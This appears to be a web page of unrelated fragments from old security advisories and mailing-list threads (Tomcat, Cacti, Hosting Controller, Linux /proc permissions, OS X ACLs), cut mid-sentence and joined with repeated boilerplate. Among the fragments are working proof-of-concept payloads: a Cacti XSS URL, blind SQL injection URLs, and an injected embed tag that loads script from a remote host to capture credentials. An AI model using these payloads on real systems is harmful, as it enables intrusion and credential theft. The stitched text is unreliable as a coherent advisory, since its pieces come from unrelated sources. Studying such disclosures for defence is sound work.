Next Page >>
permissive
Description:
The JULI logging component allows web applications to provide their own
logging configurations. The default security policy does not restrict this
configuration and allows an untrusted web application to add files or
overwrite existing files where the Tomcat process has the necessary file
permissions to do so.
Mitigation:
Apply the following patch to the catalina.policy file
http://svn.apache.org/viewvc?rev=606594&view=rev
The patch will be included in 5.5.25 onwards and 6.0.16 onwards
12- [User] can import unwanted plan or change the plans.
13- [Remote Attacker] can find web site path.
14- [Remote Attacker] can enable or disable all Hosting Controller forums by SQL Injection.
15- [User] can change other's host headers.
[Remote attacker] = (Unauthorized user without any permission or access.)
[User] = (A user with a simple account.)
####################
- Exploits: (or POCs)
####################
http://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27
This vulnerability is only exploitable if the victim is allowed to view
graphs. This will be true if the victim has previously authenticated
against Cacti or if both the guest user has been activated (default:
disabled) and the graph view permission was set to 'guest' (default:
'No User').
This vulnerability was tested with Firefox 3.0.6.
The Cacti group provides a patch to fix this vulnerability:
On Wed, Oct 28, 2009 at 10:30:37PM +0100, Pavel Machek wrote:
> On Tue 2009-10-27 11:49:32, CaT wrote:
> > On Tue, Oct 27, 2009 at 12:29:09AM +0300, Dan Yefimov wrote:
> > > and testing them. Remember the scenario from the original mail and try
> > > finding a window, during which creating a hardlink would still work thus
> > > evading directory permissions check.
> >
> > The main thing this does is allow a hardlink-like attack to work across
> > mountpoints afaics.
>
> Yes, plus it allows "hardlinks" on deleted files, and this "strange
The user can still manually override the charset to UTF-7 via the browser menu, regardless of anything the Apache server sends.
re: "There is no problem to trick the victim and force him to change the encoding of his browser by little social engineering"
For the Apache 403 error page, the only opportunity to "trick" the victim is within the URL itself. It would be quite a feat of social engineering to do this within a URL, between the phrases "You don't have permission to access" and "on this server".
There are many possible malicious strings in UTF-7, and any sequence of character values less than 0x80 starting with a "+" is potentially a UTF-7 string. This is why it is not appropriate for browsers to automatically interpret text as UTF-7. Preventing a user from manually overriding the specified charset and interpreting strings as UTF-7 is not something a web server can do. If you feel this manual function should be disabled in browsers, it may be better to let the browser developers know.
re: percent-encoding the "+" character in URLs
This is forward from lkml, so no, I did not invent this
hole. Unfortunately, I do not think lkml sees this as a security hole,
so...
Jamie Lokier said:
> > > a) the current permission model under /proc/PID/fd has a security
> > > hole (which Jamie is worried about)
> >
> > I believe its bugtraq time. Being able to reopen file with additional
> > permissions looks like a security problem...
> >
> This is forward from lkml, so no, I did not invent this
> hole. Unfortunately, I do not think lkml sees this as a security hole,
> so...
>
> Jamie Lokier said:
>>>> a) the current permission model under /proc/PID/fd has a security
>>>> hole (which Jamie is worried about)
>>>
>>> I believe its bugtraq time. Being able to reopen file with additional
>>> permissions looks like a security problem...
>>>
X. LEGAL NOTICES
Copyright (c) 2009 Francesco "ascii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
service_getTopicList_story()
in /system/lib-story.php
ex. the service_submit_staticpages() one allows to specify a dangerous
sp_php flag in submitting "staticpages"; if the staticapages.PHP permission
is set to true for the staticpage admin (not the default), the page will be
evaluated as PHP code.
If not, you can extract the admin hash, then have access to administration
panel by the cookie:
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.
The vulnerability is in a function of common.php which is called from
the login.php page. The script fails to sanitize the input when
verifying the user has permission to use the service.
III. ANALYSIS
Successful exploitation allows an attacker to gain complete control over
an affected system. Because the the Administration Server runs as an
> material. By submitting the CFP package the author agrees to the
> following terms:
>
> * You confirm that the material submitted is your own except for where
> explicit references to third-party works are made.
> * You confirm that you have obtained permission to use and distribute
> third-party content, like images.
> * You give permission to DEFCON Switzerland to publishing/distributing
> your material either in physical or electronic format without royalty.
> * You give permission to DEFCON Switzerland to create audio and video
> recordings of your presentation and publish/distribute these without
material. By submitting the CFP package the author agrees to the
following terms:
* You confirm that the material submitted is your own except for where
explicit references to third-party works are made.
* You confirm that you have obtained permission to use and distribute
third-party content, like images.
* You give permission to DEFCON Switzerland to publishing/distributing
your material either in physical or electronic format without royalty.
* You give permission to DEFCON Switzerland to create audio and video
recordings of your presentation and publish/distribute these without
The Realname CCK User Reference Widget module adds a new widget to the
User Reference CCK field type that uses the Realnames for autocompletion
(http://drupal.org/project/realname_userreference).
Only the access content permission is needed to access the page which
displays the user names and real names for users, used by the
autocompletion widget, resulting in an information disclosure
vulnerability.
Systems affected:
session until authentication data has been entered.
We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.
IV. IMPACT
Impact of the vulnerability depends on the stored data. PMP is often
That said, the user in the example already has access to the file (in
a running process), and would be able to do so again, *if he had
access to a directory where the file was hard-linked*. Pavel
described that the sysadmin checked for that, but even if this worked
as expected, there's a race condition where the user could create the
hard link after the sysadmin checked, but before the permissions were
corrected. Unlikely, I know... but possible.
There's a nearly identical case that works in all Unixen, AFAIK: You
have /a/b/file1, which is writable to user1. The user has permission
to descend /a and /a/b. At some point user1 does a cd to /a/b. Then
It works on Debian 2.6.26 out of the box. It is not an obscure patched
kernel case I am afraid.
If you redir an FD to a file using thus redir-ed FD in /proc allows you
to bypass directory permissions for where the file is located.
Thankfully, file permissions still apply so you need an app which has
silly file perms in a bolted down directory for this.
Symlinking the same file to a link on a normal ext3 or nfs filesystem as
a sanity check shows correct permission behaviour. If you try to write
On 24.10.2009 22:05, Anton Ivanov wrote:
> It works on Debian 2.6.26 out of the box. It is not an obscure patched
> kernel case I am afraid.
>
> If you redir an FD to a file using thus redir-ed FD in /proc allows you
> to bypass directory permissions for where the file is located.
> Thankfully, file permissions still apply so you need an app which has
> silly file perms in a bolted down directory for this.
>
> Symlinking the same file to a link on a normal ext3 or nfs filesystem as
> a sanity check shows correct permission behaviour. If you try to write
psz@maths.usyd.edu.au wrote:
> > According to POSIX, if you open the directory with O_SEARCH then openat()
> > does not re-check search (+x) permissions.
>
> My 2.6.26 kernel (or Debian lenny) does not seem to know about O_SEARCH.
> But anyway... even if openat() does not re-check permissions, it should
> surely fail when in fact it does not have permissions? Surely, directory
> contents are not cached? Or, do you have an example (of a running OS)
initial read-only.
Do a strace on your test and you will see that the 'file descriptor'
in /proc
will be accessed as an ordinairy file. After checking the directory
permissions
of that particular file an open will be performed on '/proc/self/fd/0'
and a new
O_WRONLY file descriptor is being created.
As Martin Rex already explained yesterday, /proc is all virtual.
arbitrary, externally hosted payload.
We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.
Vulnerable Variable Value:
vpid_prefix = "><embed/src="http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=always><a name="
OSX 10.5 "Leopard" has activated ACL use and gives ACLs preference over standard POSIX permission bits. Apple's "Get Info" GUI sets and displays an odd and confusing mix of POSIX and ACL settings, leaving plenty of room for confused security.
Unfortunately, there are not yet adequate tools to detect ACL changes. Tools like open-source Tripwire only check POSIX permission bits (a feature request has been submitted for ACL support in open-source Tripwire). Apple's proprietary Disk Utility appears to only check what Apple wants to check (it probably leaves areas like user files vulnerable).
Historically, a number of legitimate and less-than-legitimate software installers have altered the POSIX permission settings for key system files and directories. Those alterations could easily be extended to ACLs, and would be more difficult to detect, since there are almost no tools to find them.
Users should carefully consider if the risks of using ACLs in OSX outweigh the benefits. For many systems with a small number of users, ACLs are massive overkill, and should probably be disabled. The following command disables ACLs on the root volume (the command only operates on each volume):
# fsaclctl -p / -d
Summary:
A design error vulnerability exists in Adobe Reader and Adobe
Acrobat Professional. A remote attacker who successfully exploit this
vulnerability can control the printer without user's permission.
Affected Software Versions:
2. Vulnerability:
####################
2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.
2.1.1. POC:
Check the exploit section.
2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.
2.2.1. POC:
Check the exploit section.
2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.
2.3.1. POC:
Check the exploit section.
parameters. This causes an SQL Injection attack possible. Follow an
example of blind SQL injection (by an authenticated user):
http://www.example.com/cacti/graph_view.php?action=preview&style=selective&graph_list=bla'%20or%20'1'='1
The following request needs admin permission to be executed, so it has
limited impact:
http://www.example.com/cacti/tree.php?action=edit&id=1&subaction=foo&leaf_id=1%20or%201%20=%201
Same as above graph_xport.php is also vulnerable to an SQLi exploitable
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with root privileges. In order to exploit this vulnerability, an
attacker must have execute permission for the set-uid root mount_smbfs
binary.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Mac OS X
III. ANALYSIS
Successful exploitation of this vulnerability results in the execution
of arbitrary code with root privileges. All an attacker needs is a
setuid-root binary and permission to execute it. In a default install,
there are numerous binaries that meet these requirements.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Mac OS X
HKEY_CLASSES_ROOT\news\shell
HKEY_CLASSES_ROOT\snews\shell
These keys may be restored under some circumstances. To prevent this
from occurring, Set the 'Deny Full Control' permission for the group
'Everyone' on the keys.
VI. VENDOR RESPONSE
Microsoft has addressed this vulnerability within MS07-056. For more
http://www.zonelabs.com/
II. DESCRIPTION
Local exploitation of an insecure permission vulnerability in multiple
Check Point Zone Labs products allows attackers to escalate privileges
or disable protection.
The vulnerability specifically exists in the default file Access Control
List (ACL) settings that are applied during installation. When an
X. LEGAL NOTICES
Copyright © 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
A1. LEGAL NOTICES
Copyright (c) 2002-2010 scip AG, Switzerland.
Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
Next Page>>
|
